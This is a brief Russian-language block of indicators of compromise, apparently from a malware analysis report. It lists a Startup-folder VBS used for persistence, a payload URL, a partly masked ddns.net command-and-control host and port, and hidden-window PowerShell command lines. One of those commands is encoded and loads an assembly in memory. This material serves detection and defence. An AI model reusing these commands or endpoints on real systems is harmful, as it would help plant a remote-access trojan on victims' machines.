Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\server.vbs
- https://f.top4top.io/p_1514cgtfp1.jpg
- %TEMP%\server.vbs
- 'jh#####n4842.ddns.net':5552
- 'f.###4top.io':443
- DNS ASK f.###4top.io
- DNS ASK jh#####n4842.ddns.net
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\Server.Vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden (Start-Process -FilePath $env:TEMP\Server.Vbs)' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgB...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden (Start-Process -FilePath $env:TEMP\Server.Vbs)